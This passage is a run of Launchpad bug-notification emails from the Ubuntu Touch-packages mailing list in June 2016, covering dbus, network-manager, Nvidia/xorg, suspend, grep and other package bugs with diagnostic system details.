[Touch-packages] [Bug 1587120] Re: Connection refused when application connects to dbus socket

2016-06-04 Thread Maarten Jacobs
The problem with light-locker (as I mentioned in comment #2) is not
related to this. I added NO_AT_BRIDGE=1 to my environment
(/etc/environment) which resolve the presentation of this error.

Consider adding NO_AT_BRIDGE=1 a work-around for this bug, although it's
not (yet) clear to me why this is needed or what it changes in the
system behavior to prevent this error from being presented.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1587120

Title:
  Connection refused when application connects to dbus socket

Status in dbus package in Ubuntu:
  New

Bug description:
  When I run an application that tries to connect to the dbus-daemon, I
  get the following error:

  ** (apport-gtk:14579): WARNING **: Couldn't connect to accessibility
  bus: Failed to connect to socket /tmp/dbus-ZT89qKVt4G: Connection
  refused

  This happens (amongst others) for apport-bug, light-locker, and
  probably a few more.

  I will be filing a separate bug on light-locker (it isn't working),
  but it may be because of this reason.

  In any event, applications should not report a connection error when
  communicating with dbus-daemon.

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: dbus 1.6.18-0ubuntu4.3
  ProcVersionSignature: Ubuntu 4.2.0-36.42~14.04.1-generic 4.2.8-ckt8
  Uname: Linux 4.2.0-36-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.21
  Architecture: amd64
  Date: Mon May 30 11:45:24 2016
  ExecutablePath: /bin/dbus-daemon
  InstallationDate: Installed on 2016-03-06 (84 days ago)
  InstallationMedia: Xubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 
(20160217.1)
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)
  upstart.dbus.log:
   module-cache-reaper-Message: Reaping abandoned data directories
   module-cache-reaper-Message: Reaping abandoned cache directories

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1587120/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1587120] Re: Connection refused when application connects to dbus socket

2016-06-04 Thread Maarten Jacobs
This appears to be the same issue as that reported in
https://bugs.launchpad.net/ubuntu/+source/at-spi2-core/+bug/1193236.

However that bug was marked as "invalid" - even though the symptoms
reported in it persist and have been reported at later dates (and I
found the same issue).

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1587120

Title:
  Connection refused when application connects to dbus socket

Status in dbus package in Ubuntu:
  New

Bug description:
  When I run an application that tries to connect to the dbus-daemon, I
  get the following error:

  ** (apport-gtk:14579): WARNING **: Couldn't connect to accessibility
  bus: Failed to connect to socket /tmp/dbus-ZT89qKVt4G: Connection
  refused

  This happens (amongst others) for apport-bug, light-locker, and
  probably a few more.

  I will be filing a separate bug on light-locker (it isn't working),
  but it may be because of this reason.

  In any event, applications should not report a connection error when
  communicating with dbus-daemon.

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: dbus 1.6.18-0ubuntu4.3
  ProcVersionSignature: Ubuntu 4.2.0-36.42~14.04.1-generic 4.2.8-ckt8
  Uname: Linux 4.2.0-36-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.21
  Architecture: amd64
  Date: Mon May 30 11:45:24 2016
  ExecutablePath: /bin/dbus-daemon
  InstallationDate: Installed on 2016-03-06 (84 days ago)
  InstallationMedia: Xubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 
(20160217.1)
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)
  upstart.dbus.log:
   module-cache-reaper-Message: Reaping abandoned data directories
   module-cache-reaper-Message: Reaping abandoned cache directories

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1587120/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1582746] Re: package gir1.2-soup-2.4 2.44.2-1ubuntu2.1 failed to install/upgrade: package is in a very bad inconsistent state; you should reinstall it before attempting configur

2016-06-04 Thread Ravi Rajpurohit
please help me

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libsoup2.4 in Ubuntu.
https://bugs.launchpad.net/bugs/1582746

Title:
  package gir1.2-soup-2.4 2.44.2-1ubuntu2.1 failed to install/upgrade:
  package is in a very bad inconsistent state; you should  reinstall it
  before attempting configuration

Status in libsoup2.4 package in Ubuntu:
  New

Bug description:
  apt-get install openssl
  above command give one error
  as show in screenshot

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: gir1.2-soup-2.4 2.44.2-1ubuntu2.1
  ProcVersionSignature: Ubuntu 4.2.0-35.40~14.04.1-generic 4.2.8-ckt5
  Uname: Linux 4.2.0-35-generic x86_64
  NonfreeKernelModules: wl
  ApportVersion: 2.14.1-0ubuntu3.19
  AptOrdering:
   openssl: Install
   gir1.2-soup-2.4: Configure
   openssl: Configure
  Architecture: amd64
  Date: Tue May 17 19:41:22 2016
  DuplicateSignature: package:gir1.2-soup-2.4:2.44.2-1ubuntu2.1:package is in a 
very bad inconsistent state; you should  reinstall it before attempting 
configuration
  ErrorMessage: package is in a very bad inconsistent state; you should  
reinstall it before attempting configuration
  InstallationDate: Installed on 2016-03-21 (56 days ago)
  InstallationMedia: Ubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 
(20160217.1)
  RelatedPackageVersions:
   dpkg 1.17.5ubuntu5.6
   apt  1.0.1ubuntu2.13
  SourcePackage: libsoup2.4
  Title: package gir1.2-soup-2.4 2.44.2-1ubuntu2.1 failed to install/upgrade: 
package is in a very bad inconsistent state; you should  reinstall it before 
attempting configuration
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libsoup2.4/+bug/1582746/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1584970] Re: Ubuntu tries to set up my USB wireless device on a wired connection

2016-06-04 Thread Matthew Fearnley
I've made a report upstream at
https://bugzilla.gnome.org/show_bug.cgi?id=767243.

** Bug watch added: GNOME Bug Tracker #767243
   https://bugzilla.gnome.org/show_bug.cgi?id=767243

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1584970

Title:
  Ubuntu tries to set up my USB wireless device on a wired connection

Status in network-manager package in Ubuntu:
  New

Bug description:
  When I start up from a Ubuntu 16.04 Live CD, I do not get a wireless
  network connection, instead it seems to see my USB device (a Belkin
  F5D8053 N Wireless USB Adapter) as a "wired connection".

  If I do 'service network-manager restart', or unplug and replug the
  device, then it sets it up with the rt2800usb driver, gives it a
  wireless connection, and allows me to connect to wifi routers as
  normal.

  A potentially similar issue has been reported with a GB-WB867D-I card
  at http://askubuntu.com/questions/758422/ubuntu-16-04-seeing-my-
  wireless-card-as-wired

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: network-manager 1.1.93-0ubuntu4
  ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
  Uname: Linux 4.4.0-21-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CasperVersion: 1.376
  CurrentDesktop: Unity
  Date: Mon May 23 22:02:27 2016
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  IpRoute:
   10.42.0.0/24 dev enp0s25  proto kernel  scope link  src 10.42.0.1  metric 
100 
   169.254.0.0/16 dev enp0s25  scope link  metric 1000
  LiveMediaBuild: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=true
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  RfKill:
   0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-con:
   NAMEUUID  TYPE
TIMESTAMP   TIMESTAMP-REAL   AUTOCONNECT  AUTOCONNECT-PRIORITY  
READONLY  DBUS-PATH   ACTIVE  DEVICE   STATE
  ACTIVE-PATH
   Wired connection 1  d553ccd9-63fb-494a-8ec6-59adc51a67f6  802-3-ethernet  
1464040759  Mon 23 May 2016 09:59:19 PM UTC  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/0  yes enp0s25  
activated  /org/freedesktop/NetworkManager/ActiveConnection/3 
   Wired connection 2  b35063c3-365d-4287-85b2-882e449f4d13  802-3-ethernet  
1464040460  Mon 23 May 2016 09:54:20 PM UTC  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/1  no  --   --   
  --
  nmcli-dev:
   DEVICE   TYPE  STATEDBUS-PATH
  CONNECTION  CON-UUID  CON-PATH
   
   enp0s25  ethernet  connected
/org/freedesktop/NetworkManager/Devices/0  Wired connection 1  
d553ccd9-63fb-494a-8ec6-59adc51a67f6  
/org/freedesktop/NetworkManager/ActiveConnection/3 
   wlx002275911486  ethernet  unavailable  
/org/freedesktop/NetworkManager/Devices/2  --  --   
 -- 
   lo   loopback  unmanaged
/org/freedesktop/NetworkManager/Devices/1  --  --   
 --
  nmcli-nm: Error: command ['nmcli', '-f', 'all', 'nm'] failed with exit code 
2: Error: Object 'nm' is unknown, try 'nmcli help'.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1584970/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589110] [NEW] !6.04 + Nvidia drivers won't wotk with dual monitors

2016-06-04 Thread DesertJim
Public bug reported:

been trying to get my dual monitors working on Ubuntu 16.04 LTS and a
nVidia GeForce 960 using 361.42

Server version 11.0
Server Vendor version 1.18.3
NV Control version 1.29

Can only get one to display the desktop. Whichever is plugged into the
DVI-I port, the other is not recognised whether it is in the DVI-D or
HDMI (using converters to VGA)


I can move the mouse to the blank screen where it shows as a large (but
moveable) X

Tried ubuntu forums for a solution but no improvement

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: xorg 1:7.7+13ubuntu3
ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
Uname: Linux 4.4.0-22-generic x86_64
NonfreeKernelModules: nvidia_uvm nvidia_modeset nvidia
.proc.driver.nvidia.gpus..02.00.0: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/gpus/:02:00.0'
.proc.driver.nvidia.registry: Binary: ""
.proc.driver.nvidia.version:
 NVRM version: NVIDIA UNIX x86_64 Kernel Module  361.42  Tue Mar 22 18:10:58 
PDT 2016
 GCC version:  gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2)
.tmp.unity_support_test.0:
 
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
CompositorUnredirectFSW: true
Date: Sat Jun  4 18:54:29 2016
DistUpgraded: Fresh install
DistroCodename: xenial
DistroVariant: ubuntu
DkmsStatus:
 bbswitch, 0.8, 4.4.0-21-generic, x86_64: installed
 bbswitch, 0.8, 4.4.0-22-generic, x86_64: installed
 nvidia-361, 361.42, 4.4.0-21-generic, x86_64: installed
 nvidia-361, 361.42, 4.4.0-22-generic, x86_64: installed
ExtraDebuggingInterest: Yes
GraphicsCard:
 NVIDIA Corporation GM206 [GeForce GTX 960] [10de:1401] (rev a1) (prog-if 00 
[VGA controller])
   Subsystem: Device [1b4c:1138]
InstallationDate: Installed on 2016-05-22 (12 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
MachineType: Supermicro X8ST3
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-22-generic 
root=UUID=a29bc0eb-97b8-41fb-b334-a8755dd8ac15 ro quiet splash
SourcePackage: xorg
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/23/2009
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: 1.0b
dmi.board.asset.tag: To Be Filled By O.E.M.
dmi.board.name: X8ST3
dmi.board.vendor: Supermicro
dmi.board.version: 1234567890
dmi.chassis.asset.tag: To Be Filled By O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: Supermicro
dmi.chassis.version: 1234567890
dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvr1.0b:bd04/23/2009:svnSupermicro:pnX8ST3:pvr1234567890:rvnSupermicro:rnX8ST3:rvr1234567890:cvnSupermicro:ct3:cvr1234567890:
dmi.product.name: X8ST3
dmi.product.version: 1234567890
dmi.sys.vendor: Supermicro
version.compiz: compiz 1:0.9.12.2+16.04.20160415-0ubuntu1
version.ia32-libs: ia32-libs N/A
version.libdrm2: libdrm2 2.4.67-1ubuntu0.16.04.1
version.libgl1-mesa-dri: libgl1-mesa-dri 11.2.0-1ubuntu2
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 11.2.0-1ubuntu2
version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A
version.xserver-xorg-core: xserver-xorg-core 2:1.18.3-1ubuntu2.2
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.1-1ubuntu2
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.7.0-1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20160325-1ubuntu1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A
xserver.bootTime: Sat Jun  4 18:49:12 2016
xserver.configfile: /etc/X11/xorg.conf
xserver.devices:
 inputPower Button KEYBOARD, id 6
 inputPower Button KEYBOARD, id 7
 inputPIXART USB OPTICAL MOUSE MOUSE, id 8
 inputAT Translated Set 2 keyboard KEYBOARD, id 9
xserver.errors:
 
xserver.logfile: /var/log/Xorg.0.log
xserver.outputs:
 
xserver.version: 2:1.18.3-1ubuntu2.2

** Affects: xorg (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug compiz-0.9 ubuntu xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1589110

Title:
  !6.04 + Nvidia drivers won't wotk with dual monitors

Status in xorg package in Ubuntu:
  New

Bug description:
  been trying to get my dual monitors working on Ubuntu 16.04 LTS and a
  nVidia GeForce 960 using 361.42

  Server version 11.0
  Server Vendor version 1.18.3
  NV Control version 1.29

  Can only get one to display the desktop. Whichever is plugged into the
  DVI-I port, the other is not recognised whether it is in the DVI-D or
  HDMI (using converters to VGA)


  I can move the mouse to the blank screen where it shows as a large
  (but moveable) X

  Tried ubuntu forums for a solution but no improvement

  ProblemType: Bug
  DistroRelease: Ubuntu 

[Touch-packages] [Bug 1589106] Re: webbrowser-app crashed with SIGABRT in __libc_message()

2016-06-04 Thread Apport retracing service
*** This bug is a duplicate of bug 1570088 ***
https://bugs.launchpad.net/bugs/1570088

Thank you for taking the time to report this crash and helping to make
this software better.  This particular crash has already been reported
and is a duplicate of bug #1570088, so is being marked as such.  Please
look at the other bug report to see if there is any missing information
that you can provide, or to see if there is a workaround for the bug.
Additionally, any further discussion regarding the bug should occur in
the other report.  Please continue to report any other bugs you may
find.

** Attachment removed: "CoreDump.gz"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676799/+files/CoreDump.gz

** Attachment removed: "Disassembly.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676801/+files/Disassembly.txt

** Attachment removed: "ProcMaps.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676803/+files/ProcMaps.txt

** Attachment removed: "ProcStatus.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676804/+files/ProcStatus.txt

** Attachment removed: "Registers.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676805/+files/Registers.txt

** Attachment removed: "Stacktrace.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676806/+files/Stacktrace.txt

** Attachment removed: "ThreadStacktrace.txt"
   
https://bugs.launchpad.net/bugs/1589106/+attachment/4676807/+files/ThreadStacktrace.txt

** This bug has been marked a duplicate of private bug 1570088

** Information type changed from Private to Public

** Tags removed: need-amd64-retrace

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589106

Title:
  webbrowser-app crashed with SIGABRT in __libc_message()

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  Starting Ubuntu 15.10 With Unity 8 apps installed but I was not
  starting 8

  ProblemType: Crash
  DistroRelease: Ubuntu 16.10
  Package: webbrowser-app 0.23+16.10.20160526-0ubuntu1
  ProcVersionSignature: Ubuntu 4.4.0-23.41-generic 4.4.10
  Uname: Linux 4.4.0-23-generic x86_64
  ApportVersion: 2.20.1-0ubuntu4
  Architecture: amd64
  Date: Fri Jun  3 20:41:41 2016
  ExecutablePath: /usr/bin/webbrowser-app
  InstallationDate: Installed on 2016-05-01 (34 days ago)
  InstallationMedia: Ubuntu 16.10 "Yakkety Yak" - Alpha amd64 (20160430)
  ProcCmdline: webbrowser-app
  ProcEnviron:
   PATH=(custom, no user)
   LANGUAGE=en_US
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  Signal: 6
  SourcePackage: webbrowser-app
  StacktraceTop:
   __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7f145cf336b0 "*** 
Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
   malloc_printerr (ar_ptr=, ptr=, 
str=0x7f145cf33778 "double free or corruption (fasttop)", action=3) at 
malloc.c:5007
   _int_free (av=, p=, have_lock=0) at 
malloc.c:3868
   __GI___libc_free (mem=) at malloc.c:2969
   ?? () from /usr/lib/x86_64-linux-gnu/dri/nouveau_dri.so
  Title: webbrowser-app crashed with SIGABRT in __libc_message()
  UpgradeStatus: No upgrade log present (probably fresh install)
  UserGroups: adm cdrom dip lpadmin plugdev sambashare sudo

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589106/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1578135] Re: suspend does not work after upgrade to Xenial (kernel 4.4.0-21-generic)

2016-06-04 Thread Christopher M. Penalver
Michele, thank you for reporting this and helping make Ubuntu better.

As per http://support.lenovo.com/us/en/products/Laptops-and-
netbooks/ThinkPad-S-Series-
laptops/ThinkPad-S540?tabName=Downloads&linkTrack=Mast:SubNav:Support:Drivers%20and%20Software|Drivers%20and%20Software&beta=false
an update to your computer's buggy, insecure, and outdated BIOS is
available (1.67). If you update to this following
https://help.ubuntu.com/community/BIOSUpdate does it change anything?

For more on BIOS updates and linux, please see
https://help.ubuntu.com/community/ReportingBugs#Bug_reporting_etiquette
.

Please note your current BIOS is already in the Bug Description, so
posting this on the old BIOS would not be helpful.

Also, you don't have to create a new bug report.

Once the BIOS is updated, if the problem is still reproducible:
1) Please provide the output of the following terminal command (not perform an 
apport-collect):
sudo dmidecode -s bios-version && sudo dmidecode -s bios-release-date
2) Please make a comment specifically advising on if there was an improvement 
or not.
3) Please mark this report Status Confirmed.

If it's not reproducible, please mark this as Invalid.

Thank you for your understanding.

** This bug is no longer a duplicate of bug 1566302
   Ubuntu 16.04: Suspend freezes the system after upgrade to linux image 
4.4.0-16

** Tags added: bios-outdated-1.67

** Package changed: xorg (Ubuntu) => linux (Ubuntu)

** Changed in: linux (Ubuntu)
   Importance: Undecided => Low

** Changed in: linux (Ubuntu)
   Status: Confirmed => Incomplete

** Attachment removed: "dmesg.txt"
   
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578135/+attachment/4663465/+files/dmesg.txt

** Summary changed:

- suspend does not work after upgrade to Xenial (kernel 4.4.0-21-generic)
+ [Lenovo ThinkPad S540] Suspend does not work after upgrade to Xenial (kernel 
4.4.0-21-generic)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1578135

Title:
  [Lenovo ThinkPad S540] Suspend does not work after upgrade to Xenial
  (kernel 4.4.0-21-generic)

Status in linux package in Ubuntu:
  Incomplete

Bug description:
  When suspending, the suspend process freezes and it's needed to hard
  shutdown the machine.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
  Uname: Linux 4.4.0-21-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: compiz
  CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
  CompositorUnredirectFSW: true
  CurrentDesktop: Unity
  Date: Wed May  4 11:35:44 2016
  DistUpgraded: 2016-05-03 15:02:16,810 ERROR got error from PostInstallScript 
./xorg_fix_proprietary.py (g-exec-error-quark: Failed to execute child process 
"./xorg_fix_proprietary.py" (No such file or directory) (8))
  DistroCodename: xenial
  DistroVariant: ubuntu
  ExtraDebuggingInterest: Yes, including running git bisection searches
  GraphicsCard:
   Intel Corporation Haswell-ULT Integrated Graphics Controller [8086:0a16] 
(rev 0b) (prog-if 00 [VGA controller])
 Subsystem: Lenovo Haswell-ULT Integrated Graphics Controller [17aa:2216]
  InstallationDate: Installed on 2015-12-09 (146 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
  MachineType: LENOVO 20B30078IX
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-21-generic 
root=UUID=e05af11c-29d9-458c-94c0-a6a9ec18c6a3 ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  UpgradeStatus: Upgraded to xenial on 2016-05-03 (0 days ago)
  dmi.bios.date: 06/26/2015
  dmi.bios.vendor: LENOVO
  dmi.bios.version: GPET65WW (1.65 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 20B30078IX
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0E50510 Pro
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvrGPET65WW(1.65):bd06/26/2015:svnLENOVO:pn20B30078IX:pvrThinkPadS5-S540:rvnLENOVO:rn20B30078IX:rvrSDK0E50510Pro:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 20B30078IX
  dmi.product.version: ThinkPad S5-S540
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.12.2+16.04.20160415-0ubuntu1
  version.ia32-libs: ia32-libs N/A
  version.libdrm2: libdrm2 2.4.67-1
  version.libgl1-mesa-dri: libgl1-mesa-dri 11.2.0-1ubuntu2
  version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
  version.libgl1-mesa-glx: libgl1-mesa-glx 11.2.0-1ubuntu2
  version.xserver-xorg-core: xserver-xorg-core 2:1.18.3-1ubuntu2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.1-1ubuntu2
  version.xserver-xorg-video-ati: xserve

[Touch-packages] [Bug 1581210] Re: test_aa-exec-click autopkgtest should not hardcode aa-exec path

2016-06-04 Thread Launchpad Bug Tracker
This bug was fixed in the package click-apparmor - 0.3.15

---
click-apparmor (0.3.15) yakkety; urgency=medium

  * debian/tests/test_aa-exec-click: Upstream AppArmor >= 2.10.95 now installs
aa-exec into /usr/bin/. Adjust the test so that it doesn't hardcode the
aa-exec install path. (LP: #1581210)

 -- Tyler Hicks   Sat, 04 Jun 2016 00:38:21 -0500

** Changed in: click-apparmor (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to click-apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1581210

Title:
  test_aa-exec-click autopkgtest should not hardcode aa-exec path

Status in click-apparmor package in Ubuntu:
  Fix Released

Bug description:
  The apparmor 2.11 beta 1 release (2.10.95) moved aa-exec from
  /usr/sbin/ to /usr/bin/ but the test_aa-exec-click hard codes the path
  as /usr/sbin/aa-exec.

  The click-apparmor test needs to be updated so that the apparmor
  package's install logic can follow upstream's lead regarding the aa-
  exec path.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/click-apparmor/+bug/1581210/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1552928] Re: New bottom edge component is harder to flick up

2016-06-04 Thread Bob Harvey
My secondary remarks in bug #1586680 are /exactly/ about this.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-ui-toolkit in
Ubuntu.
https://bugs.launchpad.net/bugs/1552928

Title:
  New bottom edge component is harder to flick up

Status in ubuntu-ui-toolkit package in Ubuntu:
  Confirmed

Bug description:
  I usually hold the phone in one hand and open the bottom edge by
  flicking up from the bottom with the thumb. This worked fine with the
  previous bottom edge, however, with the new one, there seems to be
  larger amount of dragging required. I keep on failing to open the
  bottom edge in the messages-app and clock app, now that they use the
  new component.

  When dragging very slowly such an big required distance does make
  sense, but for quick flicks with the thumb, it should also take the
  speed and/or touch points history into account and reduce the required
  distance if it detects a fast flick gesture.

  In the right edge implementation for instance, it tracks the touch
  points and already activates the gesture after a rather short distance
  (2 grid units), provided it is a one-way gesture with increasing
  distance from the edge in each recognized point. Such a logic would
  imo also make sense for the bottom edge.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/+bug/1552928/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1584784] Re: Using NBS, X apps under Unity8 need interaction to start in pocket-desktop

2016-06-04 Thread mir-ci-bot
Fix committed into lp:mir at revision None, scheduled for release in
mir, milestone 0.24.0

** Changed in: mir
   Status: In Progress => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to mir in Ubuntu.
https://bugs.launchpad.net/bugs/1584784

Title:
  Using NBS, X apps under Unity8 need interaction to start in pocket-
  desktop

Status in Mir:
  Fix Committed
Status in Mir 0.23 series:
  In Progress
Status in Mir 0.24 series:
  Fix Committed
Status in QtMir:
  Invalid
Status in mir package in Ubuntu:
  In Progress
Status in qtmir package in Ubuntu:
  New
Status in xorg-server package in Ubuntu:
  Invalid

Bug description:
  With Mir 0.23.0, X apps under Unity8 need some interaction to get the
  applications to start. 0.23.0 is blocked pending fix.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mir/+bug/1584784/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1535458] Re: [15.10 REGRESSION] Randomly wrongly detects files as binary

2016-06-04 Thread teo1978
Sorry, not sure what you mean exactly by "affecting a release".

This issue appeared at some point on wily (with some update, NOT at
dist-upgrade) and I wonder how it could be ignored for so long, when it
was first reported AND after it turned out that it had wrongly be marked
as duplicate.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to grep in Ubuntu.
https://bugs.launchpad.net/bugs/1535458

Title:
  [15.10 REGRESSION] Randomly wrongly detects files as binary

Status in grep package in Ubuntu:
  Confirmed

Bug description:
  I have a folder with a bunch of subfolder and several hundred or
  thousands files, most of them PHP files (obviously text).

  I often use grep recursively, like this:
$ grep -R somepattern *

  Since the upgrade from 15.04 to 15.10, it often happens that a lot of text 
files are wrongly treated as binary. That means that, when a match is found, 
instead of getting the normal output which would show the file name and the 
matching line (with the matching substring highlighted), I get the bogus 
message:
binary file whatever.php matches

  Just to be clear: in one invocation of grep -R, I get mixed output
  with a lot of matches shown in the expected way and quit e a few
  matches shown in the wrong way, even though ALL matching files are
  text files.

  
  This worked as expected before the upgrade from 15.04 and 15.10.

  
  This is a HUGE issue that makes it impossible to do everyday developing work.

  
  Until you fix it, please f***ing roll back grep to the previous version, 
because this sh** is unusable.

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: grep 2.21-2
  ProcVersionSignature: Ubuntu 4.2.0-23.28-generic 4.2.6
  Uname: Linux 4.2.0-23-generic x86_64
  NonfreeKernelModules: nvidia
